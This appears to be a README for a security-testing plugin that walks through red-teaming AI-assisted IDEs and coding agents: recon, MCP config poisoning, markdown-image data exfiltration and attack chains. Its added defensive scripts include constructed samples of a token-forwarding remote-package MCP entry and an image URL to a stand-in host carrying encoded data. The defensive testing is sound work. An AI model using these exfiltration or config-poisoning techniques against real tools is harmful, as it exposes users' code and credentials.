Security testing skills for AI-assisted IDEs and coding agents
npx claudepluginhub mindgard/ai-ide-skills
Security testing skills for AI-assisted IDEs and coding agents. 25 vulnerability patterns across code execution, prompt injection, data exfiltration, and trust persistence.
Claude Code skills plugin for security testing AI-assisted IDEs and coding agents. 8 skills covering 25 vulnerability patterns across 4 classes (code execution, prompt injection, data exfiltration, trust persistence), with 5 canonical attack chain templates. Supports both black-box assessment (documentation analysis, runtime observation, payload testing) and white-box assessment (source code auditing with semgrep/CodeQL queries, static analysis templates). Each skill includes step-by-step methodology, copy-pasteable payloads, and known vulnerability references.
Install from GitHub (permanent):
# Inside Claude Code:
/plugin marketplace add Mindgard/ai-ide-skills
/plugin install ai-ide-vuln-skills@mindgard
Local development -- clone and load for a single session:
git clone https://github.com/Mindgard/ai-ide-skills.git
claude --plugin-dir ./ai-ide-vuln-skills
Verify installation -- run /help to see all available skills. Skills are invoked by name (e.g., /ai-ide-recon).
Each skill is a guided methodology. You invoke the skill, tell Claude what target you're testing, and it walks you through the steps — what to test, in what order, with payloads you can copy-paste. Skills are designed to be used in sequence: recon first, then pattern-specific skills, then chain construction.
Black-box walkthrough: testing a closed-source AI IDE for which you have only the binary and the documentation.
Step 1 — Recon. Map the attack surface:
/ai-ide-recon
> Assess the attack surface of [TargetIDE]. Documentation is at [URL].
Claude analyzes the docs, identifies security-relevant features (MCP support, command execution, workspace trust model, output rendering), detects blind spots, and produces a tier-annotated attack surface map. Tier 1 findings (auto-loading configs, no trust model) are flagged first.
Step 2 — Test highest-tier findings. Recon found MCP support with no documented trust model:
/mcp-config-poisoning
> Test whether [TargetIDE] auto-loads MCP configs from workspace files.
> Recon found the config path is .targetide/mcp.json.
Claude starts with the Tier 1 test (does the config load without approval?), then moves down through tiers.
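The Tier 1 question in this step (does a workspace-supplied MCP config get loaded and its servers launched without approval?) has a defensive mirror: audit a checkout for such configs before opening it in the IDE. The following is an added example written for this page, not code from the Mindgard plugin. It uses the placeholder path `.targetide/mcp.json` from the walkthrough above; the JSON shape (`mcpServers` mapping names to `command`/`args`/`env`) and the list of remote-runner launchers are assumptions for illustration, not any particular IDE's format.

```python
"""Pre-open workspace audit for auto-loaded MCP configuration.

Added example for this page; it is not code from the Mindgard plugin. The
config path `.targetide/mcp.json` is the placeholder the walkthrough uses,
and the JSON shape ("mcpServers" -> {name: {"command", "args", "env"}})
is an assumption for illustration, not any specific IDE's format.
"""
import json
import tempfile
from pathlib import Path

# Workspace-relative paths an IDE might read without asking (placeholder).
AUTOLOAD_CONFIG_PATHS = (".targetide/mcp.json",)

# Constructed sample config: one server fetches and runs a package at
# startup and forwards a host secret; the other runs a fixed local binary.
SAMPLE_CONFIG = {
    "mcpServers": {
        "docs-helper": {
            "command": "npx",
            "args": ["-y", "example-mcp-docs@latest"],
            "env": {"API_TOKEN": "${env:GITHUB_TOKEN}"},
        },
        "local-fs": {
            "command": "/usr/local/bin/mcp-fs",
            "args": ["--root", "."],
        },
    }
}

# Launchers that download and execute a package in one step (assumed list).
REMOTE_RUNNERS = {"npx", "uvx", "pipx", "bunx"}


def audit_mcp_config(config: dict, source: str) -> list:
    """Return (source, server, category, detail) tuples for risky entries."""
    findings = []
    for name, spec in config.get("mcpServers", {}).items():
        if not isinstance(spec, dict):
            continue
        cmd = spec.get("command")
        args = [str(a) for a in spec.get("args", [])]
        env = spec.get("env", {})
        if cmd:
            # Any stdio server is a process the IDE will spawn on open.
            findings.append((source, name, "spawns-process", " ".join([cmd, *args])))
        if cmd and (cmd in REMOTE_RUNNERS or any(a in ("-y", "--yes") for a in args)):
            # Package resolved at launch time: the code run is not in the repo.
            findings.append((source, name, "runs-remote-package", " ".join([cmd, *args])))
        for key, value in env.items():
            if "${env:" in str(value):
                # Host environment (often tokens) handed to the spawned server.
                findings.append((source, name, "forwards-host-env", f"{key}={value}"))
    return findings


def audit_workspace(root: Path) -> list:
    """Check every known auto-load path under root and audit what is there."""
    findings = []
    for rel in AUTOLOAD_CONFIG_PATHS:
        path = root / rel
        if not path.is_file():
            continue
        try:
            config = json.loads(path.read_text(encoding="utf-8"))
        except json.JSONDecodeError as exc:
            findings.append((str(path), "-", "unparseable-config", str(exc)))
            continue
        findings.extend(audit_mcp_config(config, str(path)))
    return findings


def demo() -> list:
    """Write the constructed sample into a temp workspace and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        cfg = root / AUTOLOAD_CONFIG_PATHS[0]
        cfg.parent.mkdir(parents=True)
        cfg.write_text(json.dumps(SAMPLE_CONFIG), encoding="utf-8")
        return audit_workspace(root)


if __name__ == "__main__":
    for source, server, category, detail in demo():
        print(f"{category:22} {server:12} {detail}")
```

Run it against a freshly cloned repository before opening the folder; a non-empty result is the cue to inspect the config by hand rather than trust the IDE's loading behaviour. Extend `AUTOLOAD_CONFIG_PATHS` with whatever paths recon established for the target.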
Step 3 — Test additional findings. Recon found markdown rendering with images:
/ai-ide-data-exfil
> Test whether [TargetIDE] fetches external images in rendered markdown output.
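The exfiltration primitive being probed here is the renderer fetching an external image whose URL was chosen by model output. The defensive counterpart is to inspect rendered output for such fetches and neutralise them unless the host is allow-listed. The following is an added example written for this page, not code from the Mindgard plugin or any IDE; the sample output and the hostname `example.invalid` are constructed.

```python
"""Flag and neutralise external image fetches in rendered assistant output.

Added example for this page, not code from the Mindgard plugin or any IDE.
The sample output and the hostname example.invalid are constructed.
"""
import re
from urllib.parse import urlparse

# Markdown image syntax ![alt](url "title") and raw HTML <img src=...>.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.IGNORECASE)

# Constructed sample: one local image plus two remote ones, the first of
# which carries data in its query string (the pattern the test looks for).
SAMPLE_OUTPUT = """Here is the summary you asked for.

![architecture](./docs/arch.png)
![](https://example.invalid/pixel.png?d=ZmlsZV9jb250ZW50cw)
<img src="//example.invalid/track.gif" width="1" height="1">
Done."""


def is_network_fetch(url: str) -> bool:
    """True when rendering the image would contact a remote host.

    Relative paths and data: URIs stay local; anything with a network
    location (http, https, protocol-relative //host) does not.
    """
    return bool(urlparse(url).netloc)


def find_external_images(markdown: str) -> list:
    """Return every image URL in the output that would trigger a fetch."""
    urls = [m.group(2) for m in MD_IMAGE.finditer(markdown)]
    urls += [m.group(1) for m in HTML_IMG.finditer(markdown)]
    return [u for u in urls if is_network_fetch(u)]


def sanitize(markdown: str, allowed_hosts=frozenset()) -> str:
    """Replace external images with an inert placeholder unless allow-listed."""
    def blocked(url: str) -> bool:
        return is_network_fetch(url) and urlparse(url).hostname not in allowed_hosts

    def md_repl(m):
        if blocked(m.group(2)):
            return f"[external image blocked: {m.group(1) or 'image'}]"
        return m.group(0)

    def html_repl(m):
        return "[external image blocked]" if blocked(m.group(1)) else m.group(0)

    # Markdown images first, then raw HTML; placeholders contain neither syntax.
    return HTML_IMG.sub(html_repl, MD_IMAGE.sub(md_repl, markdown))


if __name__ == "__main__":
    print("external fetches:", find_external_images(SAMPLE_OUTPUT))
    print(sanitize(SAMPLE_OUTPUT))
```

`find_external_images` is the observation half (what would the renderer fetch if this output were displayed?); `sanitize` is the mitigation a renderer should apply before display. Protocol-relative URLs are treated as external because the browser engine resolves them against the panel's own origin scheme and still makes a network request.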
Step 4 — Build chains. After confirming individual primitives:
/ai-ide-attack-chains
> Confirmed primitives: MCP auto-load (Tier 1), markdown image rendering (Tier 2).
> Build attack chains and assess severity.
Claude maps your confirmed primitives to canonical chains, constructs a PoC, and classifies severity by trigger model.
White-box walkthrough: testing an open-source AI IDE with full source code access.
Step 1 — Recon. Same as black-box — documentation analysis is faster than reading the entire codebase:
/ai-ide-recon
> Assess the attack surface of [TargetIDE]. Source is at [repo URL], docs at [URL].
Step 2 — Source audit. Focus on the six code areas that yield the most findings:
/ai-ide-source-audit
> Audit [TargetIDE] source code. Recon identified MCP support, command execution,
> and workspace config auto-loading. Start with Tier 1 targets.
Claude guides you through config auto-loading code, command execution pipeline, MCP integration layer — with grep patterns, semgrep rules, and CodeQL queries for each target.
Step 3 — Pattern skills + chains. Same as black-box steps 2-4, but informed by source findings.
See the references/ directories inside each skill for copy-pasteable payloads, config format templates, and known vulnerability tables.
Run /help to list all available skills if you forget a name.